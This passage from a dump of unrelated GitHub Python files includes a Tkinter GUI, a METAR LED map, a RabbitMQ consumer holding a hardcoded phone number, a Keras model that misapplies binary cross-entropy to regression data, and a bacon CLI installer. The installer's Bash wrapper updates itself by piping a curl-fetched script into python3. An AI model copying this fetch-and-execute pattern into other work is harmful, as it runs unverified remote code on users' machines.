files.\")\r\n\r\n\r\n# Create the GUI using Tkinter\r\nwindow = tk.Tk()\r\nwindow.title(\"Merge Excel Files\")\r\nwindow.geometry(\"400x200\")\r\n\r\n# Label and Entry for the path of file 1\r\nlabel_file_path1 = tk.Label(window, text=\"Path of file 1:\")\r\nlabel_file_path1.pack()\r\nentry_file_path1 = tk.Entry(window)\r\nentry_file_path1.pack()\r\n\r\n# Browse button for file 1\r\nbutton_browse1 = tk.Button(window, text=\"Browse\", command=lambda: 
browse_file(entry_file_path1))\r\nbutton_browse1.pack()\r\n\r\n# Label and Entry for the path of file 2\r\nlabel_file_path2 = tk.Label(window, text=\"Path of file 2:\")\r\nlabel_file_path2.pack()\r\nentry_file_path2 = tk.Entry(window)\r\nentry_file_path2.pack()\r\n\r\n# Browse button for file 2\r\nbutton_browse2 = tk.Button(window, text=\"Browse\", command=lambda: browse_file(entry_file_path2))\r\nbutton_browse2.pack()\r\n\r\n# Button to start the merge and filter process\r\nbutton_process = tk.Button(window, text=\"Compare\", command=process_files)\r\nbutton_process.pack()\r\n\r\nlabel_message = tk.Label(window)\r\nlabel_message.pack()\r\n\r\nwindow.mainloop()\r\n","repo_name":"lostefanoz/stefano","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33713531077","text":"import json\r\nimport cv2\r\nimport os\r\nimport glob\r\n\r\ndef getRatio(h, w):\r\n\t'''return ratios'''\r\n\tratio = h/w\r\n\tscore = (ratio/1.618)*100\r\n\treturn score\r\n\r\n\r\ndef getVerticalPts(keypoints):\r\n\t'''y-axis ratios(2)'''\r\n\tx1, y1 = keypoints['left_eye']\r\n\tx2, y2 = keypoints['right_eye']\r\n\t# approximation for line\r\n\tv1 = int((y1+y2)/2)\r\n\r\n\tx2, v2 = keypoints['nose']\r\n\r\n\tx1, y1 = keypoints['mouth_left']\r\n\tx2, y2 = keypoints['mouth_right']\r\n\t#approx line\r\n\tv3 = int((y1+y2)/2)\r\n\r\n\treturn v1, v2, v3\r\n\r\n\r\ndef getHorizontalPts(keypoints):\r\n\t'''x-axis ratios(2)'''\r\n\th2, y = keypoints['left_eye']\r\n\th3, y = keypoints['right_eye']\r\n\treturn h2, h3\r\n\r\n\r\ndef calculateScore(result):\r\n\t'''write scores to file'''\t\r\n\toutput_path = './data_store/output'\r\n\tx,y,w,h = result[0]['box']\r\n\tkeypoints = result[0]['keypoints']\r\n\r\n\tratio1 = getRatio(h, w)\r\n\r\n\t#vertical ratios\r\n\tv1, v2, v3 = getVerticalPts(keypoints)\r\n\tv4 = y+h\r\n\tratio2 = getRatio(v3-v1, v2-v1)\r\n\tratio3 = getRatio(v4-v1, v3-v1)\r\n\r\n\t#horizontal ratios\r\n\th1 = x\r\n\th4 = x+w\r\n\th2, h3 = getHorizontalPts(keypoints)\r\n\tratio4 = getRatio(h3-h1, h3-h2)\r\n\tratio5 = getRatio(h4-h1, h3-h1)\r\n\r\n\tface_det = {\r\n\t\t'score1':ratio1,\r\n\t\t'score2':ratio2,\r\n\t\t'score3':ratio3,\r\n\t\t'score4':ratio4,\r\n\t\t'score5':ratio5\r\n\t}\r\n\r\n\twith open(os.path.join(output_path,\"face_det.txt\"),'w') as out:\r\n\t\tjson.dump(face_det, out)\r\n","repo_name":"sudhamsugurijala/Facial-Reconstruction","sub_path":"server/measurements/getMeasure.py","file_name":"getMeasure.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15899164690","text":"\njum_semen = int(input(\"Enter the number of cement bags you are buying: \")) \nharga_semen = 60000\ndiskon1 = 2/100\ndiskon2 = 5/100\n\n\n \nif jum_semen > 200 :\n    Total_diskon = jum_semen * harga_semen * diskon2 \n\nelif jum_semen > 100 :\n    Total_diskon = jum_semen * harga_semen * diskon1 \nelse: \n    Total_diskon = 0 \n\nprint(\"cement quantity = \" , jum_semen) \nprint(\"total discount from the purchase = \" , Total_diskon)\n\n \n","repo_name":"AlimRabbani/RPL-1-DASAR-PHYTON-","sub_path":"hitung.py","file_name":"hitung.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5377170427","text":"import argparse\nimport shell_executor as se\nimport yaml\n\n\nclass 
rt_cmd:\n    def __init__(self):\n        self.cmds = []\n    def add(self, c):\n        self.cmds.append(c)\n\nclass rt_env:\n    def __init__(self):\n        self.envs = {}\n    def set(self, k, v):\n        self.envs[k] = v\n\nclass rt_files:\n    def __init__(self):\n        self.links = set()\n        self.copys = set()\n\nclass rt_job:\n    def __init__(self, name):\n        self.name = name\n        self.file = rt_files() \n        self.env = rt_env() \n        self.cmd = rt_cmd()\n    def get_cwd(self):\n        return \"@DEP\" \n\nclass rt_test:\n    def __init__(self, name):\n        self.name = name\n        self.jobs = []\n    def create_job(self, name):\n        j = rt_job(name)\n        self.jobs.append(j)\n        return j\n\nclass regression_test:\n    def __init__(self, ws_dir):\n        self.ws_dir = ws_dir\n        self.tests = []\n    def create_test(self, name):\n        t = rt_test(name)\n        self.tests.append(t)\n        return t\n    def process(self):\n        parser = argparse.ArgumentParser()\n        parser.add_argument('-w', '--workers', type=int, default=2, help='max concurrent workers(thread), default=2')\n        parser.add_argument('-l', '--list', action=\"store_true\", help='list job only')\n        parser.add_argument('-g', '--gui', action=\"store_true\", help='show gui')\n        args = parser.parse_args()\n        jobs = {}\n        for t in self.tests:\n            last_job_name = None\n            for j in t.jobs:\n                job_name = t.name + \"_\" + j.name\n                job_data = {}\n                cmds = []\n                for l in j.file.links:\n                    if not (l.startswith(\"/\") or l.startswith(\"@\")):\n                        l = \"@WD/\" + l\n                    cmds.append(f\"ln -s {l} . || :\")\n                for c in j.file.copys:\n                    if not (c.startswith(\"/\") or c.startswith(\"@\")):\n                        c = \"@WD/\" + c\n                    cmds.append(f\"cp -rf {c} . || :\")\n                cmds.extend(j.cmd.cmds)\n                job_data[\"cmds\"] = cmds\n                job_data[\"envs\"] = j.env.envs\n                if last_job_name is not None:\n                    job_data[\"dep\"] = last_job_name\n                jobs[job_name] = job_data\n                last_job_name = job_name\n        \n        a = se.Agent(self.ws_dir, jobs)\n        if args.gui:\n            a.launch_gui()\n            return\n        if not args.list:\n            a.run(args.workers)\n        a.dump_csv(\"se_result.csv\")\n        print(\"see se_result.csv\")\n","repo_name":"gkmike/shell_executor","sub_path":"example/100_tiny_regression_wrapper/tiny_regression_test.py","file_name":"tiny_regression_test.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"7446773125","text":"import numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.datasets import load_diabetes\r\nimport time\r\n\r\n# 1. Data\r\n\r\ndatasets = load_diabetes()\r\nprint(datasets.DESCR)\r\nprint(datasets.feature_names)\r\n# Attribute information:\r\n# - age\r\n# - sex\r\n# - body mass index\r\n# - bp, mean blood pressure\r\n# - s1 tc, total serum cholesterol\r\n# - s2 ldl, low-density lipoproteins\r\n# - s3 hdl, high-density lipoproteins\r\n# - s4 tch, total cholesterol / HDL\r\n# - s5 ltg, possibly log of serum triglycerides level\r\n# - s6 glu, blood sugar level\r\n#['age', 'sex', 'bmi', 'bp', 's1', 's2', 's3', 's4', 's5', 's6']\r\n\r\nx = datasets.data\r\ny = datasets.target\r\nprint(x.shape,y.shape) #(442,10) (442,)\r\n\r\nx_train,x_test,y_train,y_test= train_test_split(\r\n    x,y,train_size=0.7,random_state=100,shuffle=True\r\n)\r\nprint(x_train.shape,y_train.shape)\r\nprint(x_test.shape,y_test.shape)\r\nprint(y_test)\r\n\r\n# 2. Model construction\r\nmodel = Sequential()\r\nmodel.add(Dense(221,activation=\"linear\", input_dim=10))\r\nmodel.add(Dense(100,activation=\"relu\"))\r\nmodel.add(Dense(50,activation=\"relu\"))\r\nmodel.add(Dense(1,activation=\"sigmoid\"))\r\n\r\n# 3. 
Compile and train\r\n\r\nmodel.compile(loss='binary_crossentropy',optimizer='adam'\r\n              ,metrics='accuracy')\r\nstart_time = time.time()\r\nmodel.fit(x_train,y_train,epochs=100,batch_size=200,verbose=0)\r\nend_time = time.time() - start_time\r\n\r\n# 4. Evaluate and predict\r\n\r\n# loss,acc = model.evaluate(x_test,y_test)\r\n# print('loss : ', loss)\r\n# print('acc : ', acc)\r\n\r\nloss = model.evaluate(x_test,y_test)\r\ny_predict=model.predict(x_test)\r\ny_predict=np.round(y_predict)\r\nacc = accuracy_score(y_test,y_predict)\r\nprint('loss : ',loss)\r\nprint('acc: ',acc)","repo_name":"Romangduck/My-AI","sub_path":"tf12_diabetes_softmax.py","file_name":"tf12_diabetes_softmax.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14405480414","text":"from aifc import Error\n\nimport pika, sys, os,re,json\nfrom pika import channel\nresult = None\n\ndef resive():\n    connection = pika.BlockingConnection(pika.ConnectionParameters(host='rmq.esphere.local'))\n    channel = connection.channel()\n    channel.queue_declare(queue='notif_lkk_11.12',durable=True)\n\n    def callback(ch, method, properties, body):\n        global result\n        result=body.decode()\n\n        try:\n            prepare_date=(body.decode())\n            # print (type(prepare_date))\n            if '79214199530' in prepare_date:\n\n                json_date= json.loads(prepare_date)\n                print(json_date['message']['text'])\n            else:\n                pass\n        except (Exception, Error) as error:\n            print(' no number '+ str(error))\n    channel.basic_consume('notif_lkk_11.12', on_message_callback=callback ,auto_ack=True)\n    channel.start_consuming()\nresive()\n","repo_name":"Ilasasds/sms","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32825333330","text":"import logging\nimport signal\nimport threading\nimport time\nimport yaml\n\nfrom . import config_file\nfrom avwx.tds import get_latest_metar\n\nlogger = logging.getLogger(__name__)\n\nflight_category_colors = {\n    'VFR': (0, 255, 0),\n    'MVFR': (0, 0, 255),\n    'IFR': (255, 0, 0),\n    'LIFR': (255, 0, 255)}\n\nclass LedController:\n    \"\"\"\n    Display LED color values to standard output.\n    This class acts as a virtual LED strip, useful for testing\n    functionality and as a base class for actual LED strips.\n    \"\"\"\n\n    def __init__(self, leds):\n        \"\"\"\n        Create an LedController\n        leds: List of LEDs\n        \"\"\"\n\n        self.leds = {led: None for led in leds}\n\n    def set_led(self, led, color):\n        \"\"\"\n        Set an LED color. The color will not display until\n        show() is called.\n        led: The LED to update\n        color: (r, g, b) tuple\n        \"\"\"\n        self.leds[led] = color\n    \n    def clear(self):\n        \"\"\"\n        Clear (turn off) the LEDs. The LEDs will not clear\n        until show() is called.\n        \"\"\"\n        for led in self.leds.keys():\n            self.leds[led] = None\n\n    def show(self):\n        \"\"\"\n        Print the LED values to the console\n        \"\"\"\n        for led, color in self.leds.items():\n            logger.info(f\"Setting LED {led} to {color}\")\n\nclass NotRaspberryPiException(Exception):\n    \"\"\"\n    Custom exception to indicate an action which can't be done because\n    the device is not a Raspberry Pi\n    \"\"\"\n    pass\n\nclass RaspberryPiLedController(LedController):\n    \"\"\"\n    Display LED color values to a WS2801 strip attached to\n    a Raspberry Pi\n    \"\"\"\n\n    def __init__(self, leds, clock_pin, data_pin):\n        \"\"\"\n        Create a RaspberryPiLedController.\n        leds: List of LED numbers\n        clock_pin: GPIO pin that the clock pin on the WS2801 connects to\n        data_pin: GPIO pin that the data pin on the WS2801 connects to\n        \"\"\"\n        super().__init__(leds)\n        import Adafruit_WS2801\n        \n        try:\n            self.pixels = Adafruit_WS2801.WS2801Pixels(len(leds),\n                                                       clk=clock_pin,\n                                                       do=data_pin)\n        except RuntimeError:\n            raise NotRaspberryPiException(\"Unable to load Adafruit_WS2801.\")\n        \n\n        # clear previously displayed colors from the WS2801\n        self.clear()\n        self.show()\n    \n    def clear(self):\n        \"\"\"\n        Set all the LEDs to off. 
The LEDs will not update until show() is called.\n \"\"\"\n super().clear()\n self.pixels.clear()\n\n def show(self):\n \"\"\"\n Update the LED strip to display the currently set colors\n \"\"\"\n for led, color in self.leds.items():\n if not color:\n color = (0, 0, 0)\n\n self.pixels.set_pixel_rgb(led, *color)\n\n self.pixels.show()\n time.sleep(1)\n\ndef load_config(config_file):\n \"\"\"Load configuration file\"\"\"\n logger.debug(f\"Reading configuration from {config_file}\")\n with open(config_file, 'rb') as config:\n return yaml.load(config, Loader=yaml.Loader)\n\ndef get_category_color(metar):\n \"\"\"\n Get the color that represents the flight category described by\n the current metar.\n VFR (Visual Flight Rules) - Green\n MVFR (Marginal Visual Flight Rules) - Blue\n IFR (Instrument Flight Rules) - Red\n LIFR (Low Instrument Flight Rules) - Magenta\n \"\"\"\n \n try:\n return flight_category_colors[metar['flight_category']]\n except KeyError:\n return\n\ndef update(controller: LedController, stations):\n \"\"\"\n Update the LED display to display current data\n controller: The controller to update\n stations: the list of stations that are to be updated\n \"\"\"\n\n # get METAR data\n try:\n metars = get_latest_metar([_['code'] for _ in stations])\n except RuntimeError:\n logging.exception(\"Unable to retrieve metar data\")\n\n # translate METAR into color values\n for station in stations:\n name = station['name']\n code = station['code']\n\n try:\n metar = metars[code]\n color = get_category_color(metar)\n\n if not color:\n logging.error(f\"Unable to determine color from METAR for: {name} ({code})\")\n except KeyError:\n metar = None\n color = None\n logging.error(f\"No metar data for: {name} ({code})\")\n\n logger.debug(f\"Setting {station['name']} ({station['code']}) to {color}\")\n controller.set_led(station['led'], color)\n\n # tell the LED controller to display the new colors\n controller.show()\n\nclass SignalReceiver:\n \"\"\"\n SignalReceiver is used to trap signals to enable clean shutdown.\n \"\"\"\n def __init__(self, signals=None):\n \"\"\"\n Create a SignalReceiver\n signals: Signal numbers to trap. 
If None, SIGINT and SIGTERM are used\n \"\"\"\n self._event = threading.Event()\n\n for signum in signals if signals else [signal.SIGINT, signal.SIGTERM]:\n signal.signal(signum, self._handle)\n\n @property\n def signaled(self):\n \"\"\"\n Return true if a signal was received\n \"\"\"\n return self._event.is_set()\n \n def wait(self, delay):\n \"\"\"\n Sleep until delay seconds have passed or a signal is received.\n delay: Maximum number of seconds to wait\n Returns true if a signal was received during the wait\n \"\"\"\n return self._event.wait(delay)\n\n def _handle(self, signum, frame):\n \"\"\"\n Handle receiving a signal\n \"\"\"\n logger.debug(f\"Received signal {signum}\")\n self._event.set()\n\ndef main():\n config = load_config(config_file)\n loglevel = logging.INFO if config['loglevel'] == 'info' else logging.DEBUG\n logging.basicConfig(level=loglevel)\n\n stations = config['stations']\n leds = [_['led'] for _ in stations]\n\n # create LED controller which sets and shows LED color values\n try:\n controller = RaspberryPiLedController(leds,\n config['rpi']['clock_pin'],\n config['rpi']['data_pin'])\n except NotRaspberryPiException:\n controller = LedController(leds)\n\n signal_receiver = SignalReceiver()\n\n while not signal_receiver.signaled:\n update(controller, stations)\n signal_receiver.wait(config['frequency'])\n \n # now that the program is ending, clear the map and wait a second\n controller.clear()\n controller.show()\n time.sleep(1)\n\nif __name__ == '__main__':\n main()","repo_name":"derekwisong/aviationmap","sub_path":"avmap/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7921880840","text":"#! /usr/bin/env python\n\"\"\"\nThis script must be compatible with Python 2 and Python 3\n\nIt downloads the bacon jar into BACON_JAR_FOLDER_LOCATION and sets up a Bash\nscript in ~/bin/bacon\n\nThe user is able to choose between the latest released jar from Maven Central\nor the latest snapshot jar.\n\nFor the latter, run the script with argument 'snapshot':\n\n $ python bacon_install.py snapshot\nor\n $ cat bacon_install.py | python - snapshot\n\nIf run without any argument, the latest released jar is downloaded by default\n\n\nThe Bash script wraps around the bacon jar so that the user can just type:\n\n $ bacon \n\nfrom the shell to run bacon commands.\n\nThe Bash script also supports update:\n\n $ bacon update\n $ bacon update snapshot\n\n'bacon update' just re-downloads this script from Github to download the\nrelevant bacon jar and the new bacon Bash script\n\"\"\"\nimport argparse\nimport hashlib\nimport os\nimport platform\nimport sys\nimport tempfile\nimport time\nimport xml.etree.ElementTree as ET\n\n\nMAVEN_CENTRAL_LINK = \"https://repo1.maven.org/maven2/org/jboss/pnc/bacon/cli/\"\nMAVEN_SNAPSHOT_LINK = \"https://repository.jboss.org/nexus/content/repositories/snapshots/org/jboss/pnc/bacon/cli/\"\n\nUSER_BACON_JAR_FOLDER_LOCATION = os.getenv(\"HOME\") + \"/.pnc-bacon/bin\"\nROOT_BACON_JAR_FOLDER_LOCATION = \"/opt/bacon/bin\"\n\nUSER_SHELL_FOLDER_LOCATION = os.getenv(\"HOME\") + \"/bin\"\nROOT_SHELL_FOLDER_LOCATION = \"/usr/local/bin\"\n\nTEMPLATE_BASH = \"\"\"\n#!/bin/bash\nset -e\n\nfunction check_if_java_installed {{\n command -v java > /dev/null 2>&1 || {{ echo >&2 \"java is required to run this command... 
Aborting!\"; exit 1; }}\n}}\nfunction usage {{\n echo \"To update to the latest released version of bacon/pnc/da/pig, run:\"\n echo \"\"\n echo \" bacon update\"\n echo \"\"\n echo \"To update to a specific released version of bacon/pnc/da/pig, run:\"\n echo \"\"\n echo \" bacon update \"\n echo \"\"\n echo \"To update to a snapshot version of bacon, run:\"\n echo \"\"\n echo \" bacon update snapshot\"\n echo \"\"\n echo \"All update commands support an optional '--location ' argument\"\n}}\nif [ \"$1\" == \"update\" ]; then\n # Script runs the bacon_install.py to update itself\n shift\n if [ \"$1\" == \"-h\" ] || [ \"$1\" == \"--help\" ]; then\n usage\n else\n curl -fsSL https://raw.github.com/project-ncl/bacon/main/bacon_install.py | python3 - \"$@\"\n fi\nelse\n check_if_java_installed\n\n if [ \"$OSTYPE\" = \"cygwin\" ]; then\n java -jar `cygpath -w {0}/bacon.jar` {1} \"$@\"\n else\n java -jar {0}/bacon.jar {1} \"$@\"\n fi\nfi\n\nif [ -z \"$1\" ]; then\n usage\nfi\n\"\"\".strip()\n\n\ndef print_mac_notice_if_required():\n \"\"\"\n Print this notice for Mac users since their PATH env var is different than\n in Linux\n \"\"\"\n\n if platform.system() == 'Darwin':\n print(\"\")\n print(\"Mac user detected! Please adjust your $PATH variable if\" +\n \" necessary to run 'bacon'\")\n print(\"\")\n print(\" $ echo 'export PATH=\\\"$PATH:${HOME}/bin\\\"' >> \" +\n \"~/.bash_profile\")\n\n\ndef download_maven_metadata_xml(url, folder):\n \"\"\"\n Download the maven-metadata.xml for bacon and put it in folder\n\n url must be without maven-metadata.xml\n \"\"\"\n if not url.endswith(\"/\"):\n url = url + \"/\"\n\n link = url + \"maven-metadata.xml\"\n download_link(link, folder, \"maven-metadata.xml\")\n\n\ndef download_link(link, folder, filename, retries=7):\n \"\"\"\n Download the link into the folder with name 'filename'\n\n Add retries in case the download fails due to stale server content issue on\n repositories.jboss.org\n \"\"\"\n\n print(\"Downloading: \" + link)\n if sys.version_info[0] >= 3:\n import urllib.request as request\n else:\n import urllib2 as request\n\n try:\n r = request.urlopen(link).read()\n\n with open(folder + \"/\" + filename, \"wb\") as f:\n f.write(r)\n except Exception as error:\n if retries > 0:\n # exponential backoff time based on 1/retries\n # max time to sleep is 30 seconds\n time_to_sleep = 30 ** (1 / retries)\n print(\"Something went wrong while downloading the link. 
Waiting {:.1f} seconds before retrying...\".format(time_to_sleep))\n time.sleep(time_to_sleep)\n download_link(link, folder, filename, retries=retries - 1)\n else:\n raise Exception(\"Something wrong happened while downloading the link: \" + link + \" :: \" + str(error))\n\n\ndef get_sha1_of_jar(url_of_jar):\n \"\"\"\n Return the sha1 of the download url of the jar.\n\n Arguments:\n - url_of_jar: url to download bacon.jar\n\n Returns: sha1 value\n \"\"\"\n with tempfile.TemporaryDirectory() as temp_folder:\n download_link(url_of_jar + \".sha1\", temp_folder, \"sha1\")\n with open(os.path.join(temp_folder, \"sha1\"), 'r') as f:\n return f.read().strip()\n\n\ndef calculate_sha1(location_of_file):\n \"\"\"\n Calculate sha1 of file\n\n returns None if file doesn't exist\n \"\"\"\n\n if not os.path.exists(location_of_file):\n return None\n # get sha1 of file\n h = hashlib.sha1()\n with open(location_of_file, 'rb') as file:\n while True:\n # Reading is buffered, so we can read smaller chunks.\n chunk = file.read(h.block_size)\n if not chunk:\n break\n h.update(chunk)\n return h.hexdigest()\n\n\ndef create_folder_if_absent(folder):\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n\nclass BaconInstall:\n \"\"\"\n Object responsible with installing bacon\n \"\"\"\n def __init__(self, bacon_jar_location, shell_location, maven_url, version=None):\n\n self.bacon_jar_location = bacon_jar_location\n self.shell_location = shell_location\n self.maven_url = maven_url\n self.latest_version = None\n self.version = version\n\n def __is_snapshot(self):\n if self.version and self.version == \"snapshot\":\n return True\n\n return False\n\n def run(self):\n \"\"\"\n Install bacon jar\n\n Returns: None\n \"\"\"\n create_folder_if_absent(self.bacon_jar_location)\n create_folder_if_absent(self.shell_location)\n\n self.latest_version = self.__get_latest_version()\n\n self.__download_version()\n self.__create_bacon_shell_script()\n\n print(\"\")\n # latest snapshot or released version installed\n if self.__is_snapshot() or self.version is None:\n print(\"Installed version: {}!\".format(self.latest_version))\n else:\n print(\"Installed version: {}!\".format(self.version))\n print_mac_notice_if_required()\n\n def __download_version(self):\n \"\"\"\n Read the maven-metadata.xml of bacon and download the latest version\n \"\"\"\n\n if self.version and \"latest\" != self.version:\n if self.__is_snapshot():\n snapshot_version = self.__get_latest_snapshot_version()\n url = self.maven_url + \\\n self.latest_version + \"/cli-\" + snapshot_version + \"-shaded.jar\"\n else:\n url = self.maven_url + \\\n self.version + \"/cli-\" + self.version + \"-shaded.jar\"\n else:\n url = self.maven_url + \\\n self.latest_version + \"/cli-\" + self.latest_version + \"-shaded.jar\"\n\n sha1_from_maven = get_sha1_of_jar(url)\n sha1_of_existing_jar = calculate_sha1(self.bacon_jar_location + \"/bacon.jar\")\n\n if sha1_from_maven == sha1_of_existing_jar:\n print(\"Skipping download since latest bacon.jar is already installed\")\n return\n\n download_link(url, self.bacon_jar_location, \"bacon.jar\")\n sha1_of_new_jar = calculate_sha1(self.bacon_jar_location + \"/bacon.jar\")\n\n print(\"Verifying checksums... 
\", end='')\n if sha1_from_maven != sha1_of_new_jar:\n print(\"Failed!\")\n print(\"Checksums do not match!\")\n print(\"Checksum from Maven is: \" + sha1_from_maven)\n print(\"Checksum from downloaded jar is: \" + sha1_of_new_jar)\n print(\"Aborting!\")\n sys.exit(1)\n else:\n print(\"Success!\")\n\n print(\"bacon installed in: {}\".format(\n self.bacon_jar_location + \"/bacon.jar\"))\n\n def __get_latest_version(self):\n \"\"\"\n Read the maven-metadata.xml of bacon and parse the last released or\n snapshot version\n \"\"\"\n\n with tempfile.TemporaryDirectory() as temp_folder:\n download_maven_metadata_xml(self.maven_url, temp_folder)\n root = ET.parse(temp_folder + \"/maven-metadata.xml\").getroot()\n\n if self.__is_snapshot():\n latest_tags = root.findall(\"versioning/versions/version\")\n\n # choose the one listed last. This might bite us in the future\n latest_tag = latest_tags[-1]\n else:\n latest_tag = root.find(\"versioning/latest\")\n\n return latest_tag.text\n\n def __get_latest_snapshot_version(self):\n\n url = self.maven_url + self.latest_version\n with tempfile.TemporaryDirectory() as temp_folder:\n download_maven_metadata_xml(url, temp_folder)\n\n root = ET.parse(temp_folder + \"/maven-metadata.xml\").getroot()\n\n latest_tag = root.findall(\"versioning/snapshotVersions/snapshotVersion\")\n return latest_tag[0].find(\"value\").text\n\n def __create_bacon_shell_script(self):\n\n filename_bacon = self.shell_location + \"/bacon\"\n filename_pnc = self.shell_location + \"/pnc\"\n filename_da = self.shell_location + \"/da\"\n filename_pig = self.shell_location + \"/pig\"\n\n with open(filename_bacon, \"w\") as f:\n f.write(TEMPLATE_BASH.format(self.bacon_jar_location, \"\"))\n with open(filename_pnc, \"w\") as f:\n f.write(TEMPLATE_BASH.format(self.bacon_jar_location, \"pnc\"))\n with open(filename_da, \"w\") as f:\n f.write(TEMPLATE_BASH.format(self.bacon_jar_location, \"da\"))\n with open(filename_pig, \"w\") as f:\n f.write(TEMPLATE_BASH.format(self.bacon_jar_location, \"pig\"))\n\n os.chmod(filename_bacon, 0o755)\n os.chmod(filename_pnc, 0o755)\n os.chmod(filename_da, 0o755)\n os.chmod(filename_pig, 0o755)\n\n\ndef is_root():\n return os.geteuid() == 0\n\n\ndef main():\n \"\"\"\n Main entry point to the program\n \"\"\"\n maven_link = MAVEN_CENTRAL_LINK\n\n parser = argparse.ArgumentParser(\"Bacon installation tool\")\n parser.add_argument('--location', required=False, help=\"Specify a directory root to install to\")\n parser.add_argument(\"version\", help=\"An optional version (or 'snapshot')\", default=None, nargs='?')\n args = parser.parse_args()\n\n if args.version == 'snapshot':\n maven_link = MAVEN_SNAPSHOT_LINK\n if args.location:\n bacon_jar_location = args.location + \"/.pnc-bacon/bin\"\n shell_location = args.location + \"/bin\"\n else:\n bacon_jar_location = USER_BACON_JAR_FOLDER_LOCATION\n shell_location = USER_SHELL_FOLDER_LOCATION\n if is_root():\n bacon_jar_location = ROOT_BACON_JAR_FOLDER_LOCATION\n shell_location = ROOT_SHELL_FOLDER_LOCATION\n\n print(\"Using version '{}' with maven location of {} and installing to {}\".format(\n args.version or 'latest', maven_link, os.path.dirname(bacon_jar_location)))\n\n bacon_install = BaconInstall(\n bacon_jar_location,\n shell_location,\n maven_link,\n version=args.version)\n try:\n bacon_install.run()\n except Exception as e:\n print(e)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"project-ncl/bacon","sub_path":"bacon_install.py","file_name":"bacon_install.py","file_ext":"py","file_size_in_byte":11706,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"73365921972","text":"# Construct BST from preorder traversal\n# function takes preorder traversal\n\nclass Node: \n\tdef __init__(self, data = 0): \n\t\tself.data = data \n\t\tself.left = None\n\t\tself.right = None\n\nclass BinaryTree : \n\tdef constructTree(self, pre): \n\t\tsize=len(pre)\n\t\troot = Node(pre[0]) \n\t\ts = [] \n\t\ts.append(root) \n\t\ti = 1\n\t\twhile ( i < size): \n\t\t\ttemp = None\n\n\t\t\twhile (len(s) > 0 and pre[i] > s[-1].data): \n\t\t\t\ttemp = s.pop() \n\t\t\t\n\t\t\tif (temp != None): \n\t\t\t\ttemp.right = Node(pre[i]) \n\t\t\t\ts.append(temp.right) \n\t\t\t\n\t\t\telse : \n\t\t\t\ttemp = s[-1] \n\t\t\t\ttemp.left = Node(pre[i]) \n\t\t\t\ts.append(temp.left) \n\t\t\ti = i + 1\n\t\treturn root ","repo_name":"bhatnitish1998/aps-2020","sub_path":"BST_from_preorder.py","file_name":"BST_from_preorder.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20186957449","text":"\n'''==========================================================\nCode by G V V Sharma\nMay 27, 2023,\nReleased under GNU/GPL\nhttps://www.gnu.org/licenses/gpl-3.0.en.html\n=========================================================='''\n \n#Spectrum of message signal using own FFT algorithm.\n \nimport numpy as np\nfrom scipy.io import wavfile\nimport matplotlib.pyplot as plt\n\ndef fft(x):\n N = len(x)\n if N == 1:\n return x\n else:\n X_even = fft(x[::2])\n X_odd = fft(x[1::2])\n factor = np.exp(-2j * np.pi * np.arange(N) / N)\n return np.concatenate([X_even + factor[:N//2] * X_odd,\n X_even + factor[N//2:] * X_odd])\n\nsample_rate, audio_data = wavfile.read(\"fm/input-audio/Sound.wav\")\n\n# Zero padding\nN = len(audio_data)\nnextpow2 = int(np.ceil(np.log2(N)))\naudio_data = np.pad(audio_data, (0, 2**nextpow2-N), mode='constant')\n\ni = fft(audio_data)\nf_i = np.fft.fftfreq(len(audio_data), d=1/sample_rate)\n\nplt.plot(f_i, np.abs(i))\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Magnitude')\nplt.title('Message Signal')\nplt.savefig(\"fm/msg/figs/FFTalgorithm.pdf\")\nplt.show()\n\n","repo_name":"gadepall/signal-processing","sub_path":"fm/msg/codes/FFTalgorithm.py","file_name":"FFTalgorithm.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8778920396","text":"import argparse\nimport csv\nimport logging\nimport os\nimport sys\nimport xml.etree.ElementTree as ET\n\n# Configure a logger\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\n####\n# Prompts the user for a yes no answer to a question\n#\n# PARAMS:\n# question: The question to ask the user\n# default: The default response to the question\n####\ndef getYesNo(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True, \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"Invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is None and choice == '':\n return valid[default]\n elif choice in valid:\n return 
